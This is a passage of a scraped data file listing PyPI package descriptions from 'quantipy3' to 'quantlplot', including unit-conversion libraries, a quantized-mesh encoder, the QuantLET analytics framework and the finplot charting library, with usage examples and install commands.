analysis of protein sequences. BMC Bioinformatics 18:339, 2017CodeCurrently, the code is hosted byE-SCIENCE.PL.DocumentationMore information on the package andexamplescan be found in theUSER MANUAL.ContactPlease contactwitolddotdyrkaatpwrdotedudotpl."} +{"package": "quantipy3", "pacakge-description": "No description available on PyPI."} +{"package": "quantitative", "pacakge-description": "No description available on PyPI."} +{"package": "quantitative-vale-model", "pacakge-description": "quantitative_vale_modelThis package consists in a Simple and profitable quantitative model to user in Brazilian VALE3 (VALE S.A.) StocksInstallpipinstallquantitative-vale-modelImportimportquantitative_vale_modelCall the principal functionsquantitative_vale_model.backtest('%Y-%m-%d')quantitative_vale_model.trade_action()"} +{"package": "quantities", "pacakge-description": "Quantities is designed to handle arithmetic and\nconversions of physical quantities, which have a magnitude, dimensionality\nspecified by various units, and possibly an uncertainty. See thetutorialfor examples. Quantities builds on the popular numpy library and is\ndesigned to work with numpy ufuncs, many of which are already\nsupported. Quantities is actively developed, and while the current features\nand API are stable, test coverage is incomplete so the package is not\nsuggested for mission-critical applications.A Python package for handling physical quantities. The source code and issue\ntracker are hosted on GitHub:https://www.github.com/python-quantities/python-quantitiesDownloadGet the latest version of quantities fromhttps://pypi.python.org/pypi/quantities/To get the Git version do:$ git clone git://github.com/python-quantities/python-quantities.gitDocumentation and usageYou can find the official documentation at:http://python-quantities.readthedocs.io/Here is a simple example:>>>importquantitiesaspq>>>distance=42*pq.metre>>>time=17*pq.second>>>velocity=distance/time>>>\"%.3f%s\"%(velocity.magnitude,velocity.dimensionality)'2.471 m/s'>>>velocity+3Traceback(mostrecentcalllast):...ValueError:Unabletoconvertbetweenunitsof\"dimensionless\"and\"m/s\"Installationquantities has a hard dependency on theNumPylibrary.\nYou should install it first, please refer to the NumPy installation guide:http://docs.scipy.org/doc/numpy/user/install.htmlTo install quantities itself, then simply run:$ pip install quantitiesTestsTo execute all tests, install pytest:$ python -m pip install pytestAnd run:$ pytestin the current directory. The master branch is automatically tested by\nGitHub Actions.Authorquantities was originally written by Darren Dale, and has received contributions frommany people.LicenseQuantities only uses BSD compatible code. See the Open Source\nInitiativelicenses pagefor details on individual licenses.Seedoc/user/license.rstfor further details on the license of quantities"} +{"package": "quantities-scidash", "pacakge-description": "Quantities is designed to handle arithmetic andconversions of physical quantities, which have a magnitude, dimensionality\nspecified by various units, and possibly an uncertainty. See thetutorialfor examples. Quantities builds on the popular numpy library and is\ndesigned to work with numpy ufuncs, many of which are already\nsupported. Quantities is actively developed, and while the current features\nand API are stable, test coverage is incomplete so the package is not\nsuggested for mission-critical applications."} +{"package": "quantitizer", "pacakge-description": "No description available on PyPI."} +{"package": "quantit-snapshot", "pacakge-description": "No description available on PyPI."} +{"package": "quantity", "pacakge-description": "The packagequantityprovides classes for unit-safe computations with\nquantities, including money.Defining a quantity classAbasictype of quantity is declared just by sub-classingQuantity:>>> class Length(Quantity):\n... pass\n...But, as long as there is no unit defined for that class, you can not create\nany instance for the new quantity class:>>> l = Length(1)\nTraceback (most recent call last):\nValueError: A unit must be given.If there is a reference unit, the simplest way to define it is giving a name\nand a symbol for it as keywords. The meta-class ofQuantitywill\nthen create a unit automatically:>>> class Mass(Quantity,\n... ref_unit_name='Kilogram',\n... ref_unit_symbol='kg'):\n... pass\n...\n>>> Mass.ref_unit\nUnit('kg')\n>>> class Length(Quantity,\n... ref_unit_name='Metre',\n... ref_unit_symbol='m'):\n... pass\n...\n>>> Length.ref_unit\nUnit('m')Now, this unit can be given to create a quantity:>>> METRE = Length.ref_unit\n>>> print(Length(15, METRE))\n15 mIf no unit is given, the reference unit is used:>>> print(Length(15))\n15 mOther units can be derived from the reference unit (or another unit), giving\na definition by multiplying a scaling factor with that unit:>>> a_thousandth = Decimal(\"0.001\")\n>>> KILOGRAM = Mass.ref_unit\n>>> GRAM = Mass.new_unit('g', 'Gram', a_thousandth * KILOGRAM)\n>>> MILLIMETRE = Length.new_unit('mm', 'Millimetre', a_thousandth * METRE)\n>>> MILLIMETRE\nUnit('mm')\n>>> KILOMETRE = Length.new_unit('km', 'Kilometre', 1000 * METRE)\n>>> KILOMETRE\nUnit('km')\n>>> CENTIMETRE = Length.new_unit('cm', 'Centimetre', 10 * MILLIMETRE)\n>>> CENTIMETRE\nUnit('cm')Instead of a number a SI prefix can be used as scaling factor. SI prefixes are\nprovided in a sub-module:>>> from quantity.si_prefixes import *\n>>> NANO.abbr, NANO.name, NANO.factor\n('n', 'Nano', Decimal('0.000000001'))\n\n>>> NANOMETRE = Length.new_unit('nm', 'Nanometre', NANO * METRE)\n>>> NANOMETRE\nUnit('nm')Using one unit as a reference and defining all other units by giving a\nscaling factor is only possible if the units have the same scale. Otherwise,\nunits can just be instantiated without giving a definition:>>> class Temperature(Quantity):\n... pass\n...\n>>> CELSIUS = Temperature.new_unit('\u00b0C', 'Degree Celsius')\n>>> FAHRENHEIT = Temperature.new_unit('\u00b0F', 'Degree Fahrenheit')\n>>> KELVIN = Temperature.new_unit('K', 'Kelvin')Derivedtypes of quantities are declared by giving a definition based on\nmore basic types of quantities:>>> class Volume(Quantity,\n... define_as=Length ** 3,\n... ref_unit_name='Cubic Metre'):\n... pass\n...\n>>> class Duration(Quantity,\n... ref_unit_name='Second',\n... ref_unit_symbol='s'):\n... pass\n...\n>>> class Velocity(Quantity,\n... define_as=Length / Duration,\n... ref_unit_name='Metre per Second'):\n... pass\n...If no symbol for the reference unit is given with the class declaration, a\nsymbol is generated from the definition, as long as all types of quantities\nin that definition have a reference unit.>>> Volume.ref_unit.symbol\n'm\u00b3'\n>>> Velocity.ref_unit.symbol\n'm/s'Other units have to be defined explicitly. This can be done either as shown\nabove or by deriving them from units of the base quantities:>>> CUBIC_CENTIMETRE = Volume.derive_unit_from(CENTIMETRE,\n... name='Cubic Centimetre')\n>>> CUBIC_CENTIMETRE\nUnit('cm\u00b3')\n>>> HOUR = Duration.new_unit('h', 'Hour', 3600 * Duration.ref_unit)\n>>> KILOMETRE_PER_HOUR = Velocity.derive_unit_from(KILOMETRE, HOUR)\n>>> KILOMETRE_PER_HOUR\nUnit('km/h')Instantiating quantitiesThe simplest way to create an instance of a classQuantitysubclass is to\ncall the class giving an amount and a unit. If the unit is omitted, the\nquantity's reference unit is used (if one is defined):>>> Length(15, MILLIMETRE)\nLength(Decimal(15), Unit('mm'))Alternatively, an amount and a unit can be multiplied:>>> 17.5 * KILOMETRE\nLength(Decimal('17.5'), Unit('km'))Also, it's possible to create aQuantitysub-class instance from a string\nrepresentation:>>> Length('17.5 km')\nLength(Decimal('17.5'), Unit('km'))Unit-safe computationsA quantity can be converted to a quantity using a different unit by calling\nthe methodQuantity.convert:>>> l5cm = Length(Decimal(5), CENTIMETRE)\n>>> l5cm.convert(MILLIMETRE)\nLength(Decimal(50), Unit('mm'))\n>>> l5cm.convert(KILOMETRE)\nLength(Decimal('0.00005'), Unit('km'))Quantities can be compared to other quantities using all comparison operators\ndefined for numbers. Different units are taken into account automatically, as\nlong as they are compatible, i.e. a conversion is available:>>> Length(27) <= Length(91)\nTrue\n>>> Length(27, METRE) <= Length(91, CENTIMETRE)\nFalseQuantities can be added to or subtracted from other quantities \u2026:>>> Length(27) + Length(9)\nLength(Decimal(36))\n>>> Length(27) - Length(91)\nLength(Decimal(-64))\n>>> Length(27) + Length(12, CENTIMETER)\nLength(Decimal('27.12'))\n>>> Length(12, CENTIMETER) + Length(17, METER)\nLength(Decimal('1712'), Length.Unit('cm'))\u2026 as long as they are instances of the same quantity type:>>> Length(27) + Duration(9)\nTraceback (most recent call last):\nIncompatibleUnitsError: Can't add a 'Length' and a 'Duration'Quantities can be multiplied or divided by scalars, preserving the unit:>>> 7.5 * Length(3, CENTIMETRE)\nLength(Decimal('22.5'), Unit('cm'))\n>>> Duration(66, MINUTE) / 11\nDuration(Decimal(6), Unit('min'))Quantities can be multiplied or divided by other quantities \u2026:>>> Length(15, METRE) / Duration(3, SECOND)\nVelocity(Decimal(5))\u2026 as long as the resulting type of quantity is defined \u2026:>>> Duration(4, SECOND) * Length(7)\nTraceback (most recent call last):\nUndefinedResultError: Undefined result: Duration * Length\u2026 or the result is a scalar:>>> Duration(2, MINUTE) / Duration(50, SECOND)\nDecimal('2.4')MoneyMoneyis a special type of quantity. Its unit type is known as currency.Money differs from physical quantities mainly in two aspects:Money amounts are discrete. For each currency there is a smallest fraction\nthat can not be split further.The relation between different currencies is not fixed, instead, it varies\nover time.The sub-packagequantity.moneyprovides classes and functions to deal\nwith these specifics.A currency must explicitly be registered as a unit for further use. The\neasiest way to do this is to callMoney.register_currency. The method\nis backed by a database of currencies defined in ISO 4217. It takes the\n3-character ISO 4217 code as parameter.Moneyderives fromQuantity, so all operations on quantities can also be\napplied to instances ofMoney. But because there is no fixed relation\nbetween currencies, there is no implicit conversion between money amounts of\ndifferent currencies. Resulting values are always quantized to the smallest\nfraction defined with the currency.A conversion factor between two currencies can be defined by using the\nclassExchangeRate. It is given a unit currency (aka base currency), a unit\nmultiple, a term currency (aka price currency) and a term amount, i.e. the\namount in term currency equivalent to unit multiple in unit currency.Multiplying an amount in some currency with an exchange rate with the same\ncurrency as unit currency results in the equivalent amount in term currency.\nLikewise, dividing an amount in some currency with an exchange rate with the\nsame currency as term currency results in the equivalent amount in unit\ncurrency.AsMoneyderives fromQuantity, it can be combined with other quantities\nin order to define a new quantity. This is, for example, useful for defining\nprices per quantum.For more details see the documentation provided with the source distribution\norhere."} +{"package": "quantize", "pacakge-description": "UNKNOWN"} +{"package": "quantized", "pacakge-description": "Transit-ChemDocumentation HomeLibrary for solving the time dependent schroedinger equation,\nand finding the probablilistic confidence of the time it takes for a quantum\nparticle to move from one place to another. Based onthis paper.FeaturesHarmonic Oscillator Basis FunctionsFunctional API for Solving the Time Independent/Time Dependent Schroedinger EquationMolecular manipulations: translation, rotation, etcGuaranteed 90%+ test coverageCLI for 1d transit time analysisCaching and optimizations for overlap and hamiltonian integralsFully type hintedLogging and input validation, with helpful error messagesLicenseLicense"} +{"package": "quantized-mesh-encoder", "pacakge-description": "quantized-mesh-encoderA fast PythonQuantized Meshencoder. Encodes a mesh with\n100k coordinates and 180k triangles in 20ms.Example viewer.The Grand Canyon and Walhalla Plateau. The mesh is created usingpydelatinorpymartini, encoded usingquantized-mesh-encoder, served on-demand usingdem-tiler, and\nrendered withdeck.gl.OverviewQuantized Meshis a format to encode terrain meshes for\nefficient client-side terrain rendering. Such files are supported inCesiumanddeck.gl.This library is designed to support performant server-side on-demand terrain\nmesh generation.InstallWith pip:pip install quantized-mesh-encoderor with Conda:conda install -c conda-forge quantized-mesh-encoderUsingAPIquantized_mesh_encoder.encodeArguments:f: a writable file-like object in which to write encoded bytespositions: (array[float]): either a 1D Numpy array or a 2D Numpy array of\nshape(-1, 3)containing 3D positions.indices(array[int]): either a 1D Numpy array or a 2D Numpy array of shape(-1, 3)indicating triples of coordinates frompositionsto make\ntriangles. For example, if the first three values ofindicesare0,1,2, then that defines a triangle formed by the first 9 values inpositions,\nthree for the first vertex (index0), three for the second vertex, and three\nfor the third vertex.Keyword arguments:bounds(List[float], optional): a list of bounds,[minx, miny, maxx, maxy]. By default, inferred as the minimum and maximum values ofpositions.sphere_method(str, optional): As part of the header information when\nencoding Quantized Mesh, it's necessary to compute abounding\nsphere, which contains all positions of the mesh.sphere_methoddesignates the algorithm to use for creating the bounding\nsphere. Must be one of'bounding_box','naive','ritter'orNone.\nDefault isNone.'bounding_box': Finds the bounding box of all positions, then defines\nthe center of the sphere as the center of the bounding box, and defines\nthe radius as the distance back to the corner. This method produces the\nlargest bounding sphere, but is the fastest: roughly 70 \u00b5s on my computer.'naive': Finds the bounding box of all positions, then defines the\ncenter of the sphere as the center of the bounding box. It then checks the\ndistance to every other point and defines the radius as the maximum of\nthese distances. This method will produce a slightly smaller bounding\nsphere than thebounding_boxmethod when points are not in the 3D\ncorners. This is the next fastest at roughly 160 \u00b5s on my computer.'ritter': Implements the Ritter Method for bounding spheres. It first\nfinds the center of the longest span, then checks every point for\ncontainment, enlarging the sphere if necessary. Thiscanproduce smaller\nbounding spheres than the naive method, but it does not always, so often\nboth are run, see next option. This is the slowest method, at roughly 300\n\u00b5s on my computer.None: Runs both the naive and the ritter methods, then returns the\nsmaller of the two. Since this runs both algorithms, it takes around 500\n\u00b5s on my computerellipsoid(quantized_mesh_encoder.Ellipsoid, optional): ellipsoid defined by its semi-majoraand semi-minorbaxes.\nDefault: WGS84 ellipsoid.extensions: list of extensions to encode in quantized mesh object. These must beExtensioninstances. SeeQuantized Mesh Extensions.quantized_mesh_encoder.EllipsoidEllipsoid used for mesh calculations.Arguments:a(float): semi-major axisb(float): semi-minor axisquantized_mesh_encoder.WGS84DefaultWGS84 ellipsoid. Has a semi-major axisaof 6378137.0 meters and semi-minor axisbof 6356752.3142451793 meters.Quantized Mesh ExtensionsThere are a variety ofextensionsto the Quantized Mesh spec.quantized_mesh_encoder.VertexNormalsExtensionImplements theTerrain Lightingextension. Per-vertex normals will be generated from your mesh data.Keyword Arguments:indices: mesh indicespositions: mesh positionsellipsoid: instance of Ellipsoid class, default: WGS84 ellipsoidquantized_mesh_encoder.WaterMaskExtensionImplements theWater Maskextension.Keyword Arguments:data(Union[np.ndarray, np.uint8, int]): Data for water mask.quantized_mesh_encoder.MetadataExtensionImplements theMetadataextension.data(Union[Dict, bytes]): Metadata data to encode. If a dictionary,json.dumpswill be called to create bytes in UTF-8 encoding.ExamplesWrite to filefromquantized_mesh_encoderimportencodewithopen('output.terrain','wb')asf:encode(f,positions,indices)Quantized mesh files are usually saved gzipped. An easy way to create a gzipped\nfile is to usegzip.open:importgzipfromquantized_mesh_encoderimportencodewithgzip.open('output.terrain','wb')asf:encode(f,positions,indices)Write to bufferIt's also pretty simple to write to an in-memory buffer instead of a filefromioimportBytesIOfromquantized_mesh_encoderimportencodewithBytesIO()asbio:encode(bio,positions,indices)Or to gzip the in-memory buffer:importgzipfromioimportBytesIOwithBytesIO()asbio:withgzip.open(bio,'wb')asgzipf:encode(gzipf,positions,indices)Alternate EllipsoidBy default, theWGS84\nellipsoidis\nused for all calculations. An alternate ellipsoid may be useful for non-Earth\nplanetary bodies.fromquantized_mesh_encoderimportencode,Ellipsoid# From https://ui.adsabs.harvard.edu/abs/2010EM%26P..106....1A/abstractmars_ellipsoid=Ellipsoid(3_395_428,3_377_678)withopen('output.terrain','wb')asf:encode(f,positions,indices,ellipsoid=mars_ellipsoid)Quantized Mesh Extensionsfromquantized_mesh_encoderimportencode,VertexNormalsExtension,MetadataExtensionvertex_normals=VertexNormalsExtension(positions=positions,indices=indices)metadata=MetadataExtension(data={'hello':'world'})withopen('output.terrain','wb')asf:encode(f,positions,indices,extensions=(vertex_normals,metadata))Generating the meshTo encode a mesh into a quantized mesh file, you first need a mesh! This project\nwas designed to be used withpydelatinorpymartini, fast elevation heightmap to terrain mesh generators.importquantized_mesh_encoderfromimageioimportimreadfrompymartiniimportdecode_ele,Martini,rescale_positionsimportmercantilepng=imread(png_path)terrain=decode_ele(png,'terrarium')terrain=terrain.Tmartini=Martini(png.shape[0]+1)tile=martini.create_tile(terrain)vertices,triangles=tile.get_mesh(10)# Use mercantile to find the bounds in WGS84 of this tilebounds=mercantile.bounds(mercantile.Tile(x,y,z))# Rescale positions to WGS84rescaled=rescale_positions(vertices,terrain,bounds=bounds,flip_y=True)withBytesIO()asf:quantized_mesh_encoder.encode(f,rescaled,triangles)f.seek(0)return(\"OK\",\"application/vnd.quantized-mesh\",f.read())You can also look at the source of_mesh()indem-tilerfor a working reference.LicenseMuch of this code is ported or derived fromquantized-mesh-tilein some way.quantized-mesh-tileis also released under the MIT license."} +{"package": "quantized-mesh-tile", "pacakge-description": "No description available on PyPI."} +{"package": "quantize-fasttext", "pacakge-description": "fasttext\u6a21\u578b\u91cf\u5316\u5de5\u5177"} +{"package": "quantizeml", "pacakge-description": "QuantizeMLFramework for quantizing Deep-learning models.This supports the quantization using low-bitwidth weights and outputs of both CNN\nand Transformer models."} +{"package": "quantizer", "pacakge-description": "No description available on PyPI."} +{"package": "quantizer-pytorch", "pacakge-description": "No description available on PyPI."} +{"package": "quantizetk", "pacakge-description": "QuantizeTKQuantizeTK is a Python library that provides a set of utilities for model optimization and quantization. It simplifies the process of loading optimized and quantized models using OnnxRuntime, along with pre-trained base models. The library is built on top oftransformersandoptimum.InstallationpipinstallquantizetkFeaturesLoad optimized, quantized, or base pipelinesSupports models in the OnnxRuntime ecosystemComprehensive logging and validation utilitiesConfigurable optimization and quantization settingsQuick StartInitialize a New Pipelinefromquantizetkimportinit_pipelinepipeline=init_pipeline(model_id=\"your_model_id\")Load an Existing Pipelinefromquantizetk.pipeline.loadimportload_pipelinepipeline=load_pipeline()Directory Structurequantizetk/\n\u2502\n\u251c\u2500\u2500 pipeline/\n\u2502 \u251c\u2500\u2500 create.py\n\u2502 \u251c\u2500\u2500 load.py\n\u2502 \u2514\u2500\u2500 __init__.py\n\u2502\n\u251c\u2500\u2500 shared/\n\u2502 \u251c\u2500\u2500 constants.py\n\u2502 \u251c\u2500\u2500 utils/\n\u2502 \u2502 \u251c\u2500\u2500 validate.py\n\u2502 \u2502 \u2514\u2500\u2500 math_util.py\n\u2502 \u2514\u2500\u2500 __init__.py\n\u2502\n\u2514\u2500\u2500 __init__.pyAPI Overviewpipeline.createcreate_pipeline(...)pipeline.loadload_pipeline(save_dir, file_name)shared.utilsvalidatevalidate_pipeline(pipeline, pipeline_type, contents)math_utilnormalize(obj, p, dim)mean_pooling(model_output, attention_mask)shared.constantsConfiguration and path constantsContributingPlease readCONTRIBUTING.mdfor details on our code of conduct, and the process for submitting pull requests to us.LicenseThis project is licensed under the MIT License - see theLICENSE.mdfile for details."} +{"package": "quantkit", "pacakge-description": "quantkitVery WIP! Finance functions.Installationpipinstallgit+https://github.com/mmngreco/quantkitDevelopersgitclonehttps://github.com/mmngreco/quantkit\npipinstall-e./quantkit"} +{"package": "quantkits", "pacakge-description": "This is a collection of quantitative tools for data science and algo-trading.[Update] 2021-01-29:\nAdded quantapi to provide HK companies\u2019 financial data."} +{"package": "quantlab", "pacakge-description": "This is an alpha preview of QuantLab. It is not ready for general usage yet.\nDevelopment happens onhttps://github.com/quantlabio/quantlab"} +{"package": "quantlab-launcher", "pacakge-description": "This package is used to launch an application built using QuantLab"} +{"package": "quantlaw", "pacakge-description": "quantlawThis package contains coding utilities for quantitative legal studies.ModulesThe package currently consists of two modules.de_extractquantlaw.de_extractis an extractor for references to statutes in German legal texts.\nDifferent to most other Named-entity recognition packages this module does not only\nidentifies the references but also extracts its content. This can e.g. be used to\nquantitativly analyze the structure of the law.For example can the content of two references in the following text be extracted.Source text:\"In den F\u00e4llen des\u00a7 111d Absatz 1 Satz 2derStrafprozessordnungfindet\u00a7 91derInsolvenzordnungkeine Anwendung.\"The extracted data would be:[[['\u00a7', '111d'], ['Abs', '1'], ['Satz', '2']]]for the lawStPO[[['\u00a7', '91']]]for the lawInsOGetting started in the documentation contains a minimal example.utilsquantlaw.utilscontains several utilities that are helpful to analyze the structure of\nthe law withBeautifulSoupandnetworkx. The documentation contains furhter\ninformation about the individual usages.InstallationPython 3.7 is recommended. Our package is provided viapip install quantlaw.Further repositoriesIt is, inter alia, used to produce the results reported in the following publication:Daniel Martin Katz, Corinna Coupette, Janis Beckedorf, and Dirk Hartung, Complex Societies and the Growth of the Law,Sci. Rep.10(2020),https://doi.org/10.1038/s41598-020-73623-xRelated Repositories:Complex Societies and the Growth of the Law(First Publication Release)Legal Data Clustering(First Publication Release)Related Data:Preprocessed Input Data forSci. Rep.10(2020)CollaborationPlease format the code usingisort,black, andflake8. An convenient option to\nensure correct formatting of the code is topip install pre-commitand runpre-commit installto add code checking and reformatting as git pre-commit hook."} +{"package": "quantlet", "pacakge-description": "QuantLETQuantLET- an event driven framework for large scale real-time analytics.Copyright (C) 2006 Jorge M. Faleiro Jr.QuantLET is an open source, event-driven framework for rapid development and deployment of real-time analytical\nmodels intended to be executing in large scale, in terms of data intensiveness or computing power (your spreadsheet can't do that).You can see afew examples of the frameworkoutlining the use of signals in a moving average cross-over strategy or how to define and use 'infinite spreadsheets'.There is also a large number of examples produced during my doctorate research and sprinkled across many articles. TheBlack Magic paperdescribes an end-to-end investigation of the use of data to detect profit opportunities in equities using price momentum. The financial languageSIGMAalso part of the same research borrowed some ideas from QuantLET, and vice-versa.The nature of any quantitative framework require a number of quite heavy auxiliary libraries and resources. QuantLET is no exception. You can pick and choose a specific extensions (as python extras) based on what you intend to do with the framework.DevelopmentIf you intend to try out the source code please make yourself aware of thelicense. It is recommended the use of containers and cloud services. At the time of this writing I usedVSCodeandRemote Containers. You will also needpoetryandpre-commit.gitclonegit@gitlab.com:jfaleiro/quantlet.gitcdquantlet\npoetryinstallAll code check and quality procedures are done as part ofpre-commit. These checks are mandatory and are a condition for automatic build and release.poetryshell\npre-commitinstallGit pre commit hooks are installed and from this point on all checks are done locally as a condition for agit committo succeed. CI-CD is done bygitlab. You can find the spec for each component in the source tree.UseTypicalsetuptoolsuse throughpip. You can use the bare bones version:pipinstallquantletOr any of the extensions (extras). If you need one single extension, saystrats:pipinstallquantlet[strats]If you want multiple extensions, like reactives and deep learning for example, you add each extension separated by comma:pipinstallquantlet[reactives,dl]You don't want to use the wildcardquantlet[*]and install all extras. Python is not really an environment geared toward large scale software development and this will bring in all depenedencies, across all extensions. Inpipandpoetryfor example this might lead to a few hours of dependency resolution alone. There are way more uses and features in QuantLET than we would like to admit and you can possibly need for one application, so be parcimonious.Each extension is defined in a project namedquantlet-[extension]. Dependencies on QuantLET'spyproject.tomlare defined like this:\"quantlet.reactives\"={git=\"https://gitlab.com/jfaleiro/quantlet-reactives.git\",rev=\"release/0.0.1\",develop=true,optional=true}This type of dependency is resolved throughgit. In each case you might need read access to the specificgitlabrepository. Feel free to investigate and get in touch if you need access or details.quantlet-streamsQuantLET elements of stream processing (filtering, grouping, selection, functional operations) on canonical and data frames format.[1,3,4,7,8]>>apply(lambdax:dict(x=x)))==[{'x':1},{'x':3},{'x':4},{'x':7},{'x':8}]This is thestreaming facetdefined as part of the financial languageSIGMA.quantlet-reactivesFast and simple framework for reactive programming. A declarative paradigm that allows the definition of what has to be done through reactive relationships, letting the computational representation automatically take care of when to do it, and which results are produced, similar to cells in an electronic spreadsheet representing values and a formula.v=[R(i)for_inrange(10000)]c=sum(*v)foriinv:i.v=normal()print(c.v)>>0.0035This is thereactives facetdefined as part of the financial languageSIGMA.quantlet-big-reactivesSupport for reactive use cases that must reply on very large data: infinite reactive graphs (infinite spreadsheets) associated to non-structured repositories. Reactives are organized in distributed nodes, allowing for automatic persistence and in memory allocation beyond the limits of one single computer.quantlet-timeseriesFast timeseries functions and transformations. Large store and retrievals of sequencial datasets infastparquetthroughtsstore.quantlet-agentsSynchronous and asynchronous agents for discrete-event simulation. This is related to thedistributionandsimulation facetsdefined as part of the financial languageSIGMA.quantlet-stratsFinancial strategies and analytics. Elements of numeric processing, data analysis, plotting and tabular transformations. Basically strats are classified in bands,BandsDefine higher a lower limits around an ongoing signal, e.g., for Bollinger and fixed bands:# Bollinger bandsa=(simple_dataframe>>std(price_tag='price')>>bollinger(ma_tag='price'))assertround(a.upper.mean(),2)==1.94assertround(a.lower.mean(),2)==-2.02# Fixed bandsa=(simple_dataframe>>fixed(ma_tag='price'))assertround(a.upper.mean(),2)==-0.05assertround(a.lower.mean(),2)==-0.03FiltersDerive a new sequence based on a original signal, e.g.# RMA, recursive moving averageassertlist(map(lambdax:dict(y=x),[1.0,2.0,3.0,4.0,5.0,6.0])>>rma(m=3))==[{'y':1.0,'rma':1.0},{'y':2.0,'rma':1.5},{'y':3.0,'rma':2.0},{'y':4.0,'rma':3.0},{'y':5.0,'rma':4.0},{'y':6.0,'rma':5.0}]# EWMA, exponentially weighted moving averageassertlist(list(map(lambdax:dict(y=x),[1.0,2.0,3.0,4.0,5.0,6.0]))>>ewma(input_tag='y'))==[{'y':1.0,'ewma':1.0},{'y':2.0,'ewma':1.1},{'y':3.0,'ewma':1.29},{'y':4.0,'ewma':1.561},{'y':5.0,'ewma':1.9049},{'y':6.0,'ewma':2.31441}]Financial engineeringCommon financial calculation QLets.Returns and cash flow streams: Absolute, single and multiple periods. Continous and discrete compounding.Options: Binomial lattice, single and multiple period binomial reactive option pricing. Black scholes model. Put-call parity pricing. Greeks.Hedging: Delta hedging. Stop price hedging.SeedingGenerators of financial sequences.Timeseries seedingRandom walk and brownian motions. Random uniform seedingStatsStatistical transformations.Uniform distributionAutocorrelation metricsInflection pointsquantlet-mlOperations related to machine learning transformations: feature engineering, interpolations, incremental and batch learning. Thisarticleis an example of [nowcasting][https://en.wikipedia.org/wiki/Nowcasting_(economics)] of trading signals using arobot traderusing incremental learning inquantlet-ml:(retrieve('XXXX',start='2013-01-01',end='2017-12-31')[['Adj.Close','Adj.Volume']]>>apply(adjust_columns)>>scale(['adj_price','adj_volume'],scalers=[price_scaler,volume_scaler])>>one_hot([\"dow\",\"dom\",\"month\"])>>window_shift(['adj_price','adj_volume'],5,separator='-')>>online_fit_predict(model,'predicted_adj_price',error_type='squared',response_variable_tag='adj_price',ignore_tags=['Date'])>>ewma('error',alpha=.2,output_tag='ewme')>>unscale(['adj_price','predicted_adj_price','adj_price-1','adj_price-2','adj_price-3','adj_price-4','adj_price-5'],scalers=[price_scaler]*7,index_column='Date'))It usesQLetsfor basic operations of window shifting, scaling, one-hot encoding, and online fit and predict in one step for streams.quantlet-dlExtension ofquantlet-mlto support deep-learning libraries and algorithms. CurrentlyKerasandTensorFlow.quantlet-scratchpadSupport for interactive use and visualization of resources inJupyternotebooks.Final NotesQuantLET is an open source project that I put together andhave been using for a very long timeto test ideas, hold discussions with fellow practitioners, and extend mydoctorate research in scientific crowdsand thetheory of enablers. The doctorate thesis was finished many years ago, in 2018, and isavailable onlineif you are curious and want to learn more about the subject.Bear in mind that the materialization of QuantLET was a result of volunteering my time in one of my many passions: investigations in technology, engineering, humans, and incentives that make humans do what they do. Nevertheless, unless I feel a compeling reason for a change, QuantLET is basically unsupported.This program is distributed in the hope that it will be useful, butWITHOUT ANY WARRANTY; without even the implied warranty ofMERCHANTABILITYorFITNESS FOR A PARTICULAR PURPOSE. See theGNU Affero General Public Licensefor more details. The license file is also shipped as part of the source code.Last, but not least, it is important to note that QuantLET was the entry point to a number of successful commercial frameworks, such asPlatformandHydra. If you have an idea on how to leverage these frameworks, or extend QuantLET, the power of large scale computing, AI, and crowds, feel free to get in touch."} +{"package": "quantlet.agents", "pacakge-description": "quantlet-agentsSynchronous and asynchronous agents for discrete-event simulation. This is related to thedistributionandsimulation facetsdefined as part of the financial languageSIGMA."} +{"package": "quantlet.core", "pacakge-description": "QuantLET-coreQuantLET-core - core components in QuantLETUtility functionsIn memory atomicity (rollback, commit)Graph structures"} +{"package": "quantlet.ml", "pacakge-description": "quantlet-mlOperations related to machine learning transformations: feature engineering, interpolations, incremental and batch learning."} +{"package": "quantlet.reactives", "pacakge-description": "quantlet-reactivesReactive programming framework for large scale real-time analytics. This is related to thereactive facetdefined as part of the financial languageSIGMA."} +{"package": "quantlet.strats", "pacakge-description": "QuantLET-stratsQuantLET-strats - QuantLET strategies, statistics, curves, filters, and financial engineering functions"} +{"package": "quantlet.streaming", "pacakge-description": "QuantLET-streamingQuantLET-streaming - Elements of stream processing in the QuantLET frameworkElements of stream processing, numeric computations, data analysis, plotting and tabular transformations (filtering, aggregations, time series, data frames, etc) in the QuantLET framework."} +{"package": "quantlet.timeseries", "pacakge-description": "QuantLET-timeseriesQuantLET-timeseries - Fast timeseries functions and transformations in QuantLETLarge store and retrievals of sequencial datasets infastparquetthroughtsstore."} +{"package": "quantlplot", "pacakge-description": "Finance PlotFinance Plotter, or finplot, is a performant library with a clean api to help you with your backtesting. It's\noptionated with good defaults, so you can start doing your work without having to setup plots, colors, scales,\nautoscaling, keybindings, handle panning+vertical zooming (which all non-finance libraries have problems with).\nAnd best of all: it can show hundreds of thousands of datapoints without batting an eye.FeaturesGreat performance compared to mpl_finance, plotly and BokehClean apiWorks with both stocks as well as cryptocurrencies on any time resolutionShow as many charts as you want on the same time axis, zoom on all of them at onceAuto-reload position where you were looking last runOverlays, fill between, value bands, symbols, labels, legend, volume profile, heatmaps, etc.Can show real-time updates, including orderbook. Save screenshot.Comes with adozengreat examples.What it is notfinplot is not a web app. It does not help you create an homebrew exchange. It does not work with Jupyter Labs.It is only intended for you to do backtesting in. That is not to say that you can't create a ticker or a trade\nwidget yourself. The library is based on the eminent pyqtgraph, which is fast and flexible, so feel free to hack\naway if that's what you want.Easy installation$pipinstallfinplotExampleIt's straight-forward to start using. This shows every daily candle of Apple since the 80'ies:importfinplotasfpltimportyfinancedf=yfinance.download('AAPL')fplt.candlestick_ochl(df[['Open','Close','High','Low']])fplt.show()Example 2This 25-liner pulls some BitCoin data off of Bittrex and shows the above:importfinplotasfpltimportnumpyasnpimportpandasaspdimportrequests# pull some datasymbol='USDT-BTC'url='https://bittrex.com/Api/v2.0/pub/market/GetTicks?marketName=%s&tickInterval=fiveMin'%symboldata=requests.get(url).json()# format it in pandasdf=pd.DataFrame(data['result'])df=df.rename(columns={'T':'time','O':'open','C':'close','H':'high','L':'low','V':'volume'})df=df.astype({'time':'datetime64[ns]'})# create two axesax,ax2=fplt.create_plot(symbol,rows=2)# plot candle stickscandles=df[['time','open','close','high','low']]fplt.candlestick_ochl(candles,ax=ax)# overlay volume on the top plotvolumes=df[['time','open','close','volume']]fplt.volume_ocv(volumes,ax=ax.overlay())# put an MA on the close pricefplt.plot(df['time'],df['close'].rolling(25).mean(),ax=ax,legend='ma-25')# place some dumb markers on low 